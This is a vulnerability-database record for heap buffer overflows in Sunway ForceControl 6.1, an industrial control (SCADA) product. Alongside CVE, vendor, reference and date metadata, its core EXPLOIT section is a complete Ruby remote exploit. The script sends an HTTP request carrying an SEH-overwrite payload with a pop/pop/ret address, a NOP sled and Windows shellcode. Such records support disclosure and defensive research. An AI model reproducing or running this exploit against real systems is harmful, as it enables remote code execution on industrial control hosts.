ID
VAR-E-201008-0051
CVE
cve_id: | CVE-2011-2960 | Trust: 1.9 |
cve_id: | CVE-2011-0340 | Trust: 1.4 |
cve_id: | CVE-2010-2974 | Trust: 0.3 |
cve_id: | CVE-2011-0488 | Trust: 0.3 |
EDB ID
35864
TITLE
Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities. CVE-2011-2960, CVE-73124. Remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sunway | model: | forcecontrol | scope: | eq | version: | 6.1 | Trust: 1.0 |
vendor: | indusoft | model: | web studio issymbol.ocx internationalseparator | scope: | - | version: | - | Trust: 0.5 |
vendor: | indusoft | model: | web studio | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | advantech | model: | indusoft | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | sunway | model: | pnetpower | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | sunway | model: | forcecontrol sp3 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | sunway | model: | forcecontrol sp2 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | sunway | model: | forcecontrol sp1 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | indusoft | model: | web studio 7.0b2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | indusoft | model: | thin client | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | advantech | model: | studio sp6 build | scope: | eq | version: | 6.161.6.0 | Trust: 0.3 |
vendor: | indusoft | model: | web studio | scope: | ne | version: | 7.0.104 | Trust: 0.3 |
vendor: | advantech | model: | studio | scope: | ne | version: | 7.0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/48328/info
Sunway ForceControl is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit these issues to execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition.
require 'socket'

# Open a TCP connection, write the request and read one response buffer.
# Returns false if the connection or write fails, true otherwise.
def send(packet)
  begin
    sock = TCPSocket.new(@ip, @port)
    sock.write(packet)
  rescue Exception => e
    return false
  else
    resp = sock.recv(1024)
    sock.close
    return true
  end
end

@ip = ARGV[0]
@port = 80

# windows/exec CMD=calc.exe
shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
            "\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
            "\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
            "\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
            "\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
            "\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
            "\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
            "\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
            "\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
            "\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
            "\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
            "\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
            "\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
            "\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
            "\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
            "\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
            "\x82\xc5\x65"

payload = "H" * 1599
payload << "\xeb\x06\x90\x90"                 # Pointer to Next SE Handler
payload << [0x719737FA].pack("V*")            # SEH Handler - p/p/r
payload << "\x90" * 40
payload << shellcode
payload << "\x90" * (4058 - shellcode.length)

pack = "GET /#{payload} HTTP/1.1\r\n"
pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"

puts "packet sent." if send(pack)
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Boundary Condition Error
Trust: 1.2
TAGS
tag: | exploit | Trust: 0.5 |
tag: | java | Trust: 0.5 |
tag: | web | Trust: 0.5 |
tag: | overflow | Trust: 0.5 |
CREDITS
Dillon Beresford
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 35864 | Trust: 1.9 |
db: | NVD | id: | CVE-2011-2960 | Trust: 1.9 |
db: | BID | id: | 48328 | Trust: 1.9 |
db: | ZDI | id: | ZDI-12-168 | Trust: 1.7 |
db: | NVD | id: | CVE-2011-0340 | Trust: 1.4 |
db: | ICS CERT ALERT | id: | ICS-ALERT-11-230-01 | Trust: 1.2 |
db: | EDBNET | id: | 61039 | Trust: 0.6 |
db: | EDBNET | id: | 57256 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 20004 | Trust: 0.6 |
db: | EDBNET | id: | 19939 | Trust: 0.6 |
db: | PACKETSTORM | id: | 118932 | Trust: 0.5 |
db: | CERT/CC | id: | VU#703189 | Trust: 0.3 |
db: | NVD | id: | CVE-2010-2974 | Trust: 0.3 |
db: | BID | id: | 42184 | Trust: 0.3 |
db: | CERT/CC | id: | VU#506864 | Trust: 0.3 |
db: | NVD | id: | CVE-2011-0488 | Trust: 0.3 |
db: | BID | id: | 45783 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-12-137-02 | Trust: 0.3 |
db: | BID | id: | 47596 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2011-2960 | Trust: 1.6 |
url: | http://www.us-cert.gov/control_systems/pdf/ics-alert-11-230-01.pdf | Trust: 1.2 |
url: | https://nvd.nist.gov/vuln/detail/cve-2011-0340 | Trust: 1.1 |
url: | https://www.securityfocus.com/bid/48328/info | Trust: 1.0 |
url: | https://www.intelligentexploit.com | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/35864/ | Trust: 0.6 |
url: | https://0day.today/exploits/20004 | Trust: 0.6 |
url: | http://support.microsoft.com/kb/240797 | Trust: 0.3 |
url: | http://www.pacwest.wonderware.com/web/news/newsdetails.aspx?newsid=203108 | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/703189 | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/506864 | Trust: 0.3 |
url: | http://www.indusoft.com/mainpage.php?aricleid=17&type=certified/hardware | Trust: 0.3 |
url: | http://www.sunwayland.com.cn/news_info_.asp?nid=3593 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/35864 | Trust: 0.3 |
url: | http://www.us-cert.gov/control_systems/pdf/icsa-12-137-02.pdf | Trust: 0.3 |
url: | http://www.advantech.com/products/advantech-studio/mod_3d1b45b0-b0af-405c-a9cc-a27b35774634.aspx | Trust: 0.3 |
url: | http://www.indusoft.com/hotfixes/hotfixes.php | Trust: 0.3 |
url: | http://www.indusoft.com/indusoftart.php?catid=1&name=iws/webstudio | Trust: 0.3 |
url: | http://secunia.com/secunia_research/2011-37/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 42184 |
db: | BID | id: | 45783 |
db: | BID | id: | 48328 |
db: | BID | id: | 47596 |
db: | PACKETSTORM | id: | 118932 |
db: | EXPLOIT-DB | id: | 35864 |
db: | EDBNET | id: | 61039 |
db: | EDBNET | id: | 57256 |
db: | EDBNET | id: | 19939 |
LAST UPDATE DATE
2022-07-27T09:25:19.226000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 42184 | date: | 2011-08-19T17:10:00 |
db: | BID | id: | 45783 | date: | 2011-08-19T17:10:00 |
db: | BID | id: | 48328 | date: | 2011-08-26T23:10:00 |
db: | BID | id: | 47596 | date: | 2013-04-02T15:57:00 |
SOURCES RELEASE DATE
db: | BID | id: | 42184 | date: | 2010-08-04T00:00:00 |
db: | BID | id: | 45783 | date: | 2011-01-12T00:00:00 |
db: | BID | id: | 48328 | date: | 2011-06-17T00:00:00 |
db: | BID | id: | 47596 | date: | 2011-04-27T00:00:00 |
db: | PACKETSTORM | id: | 118932 | date: | 2012-12-19T06:24:20 |
db: | EXPLOIT-DB | id: | 35864 | date: | 2011-06-17T00:00:00 |
db: | EDBNET | id: | 61039 | date: | 2012-09-18T00:00:00 |
db: | EDBNET | id: | 57256 | date: | 2011-06-17T00:00:00 |
db: | EDBNET | id: | 19939 | date: | 2012-12-19T00:00:00 |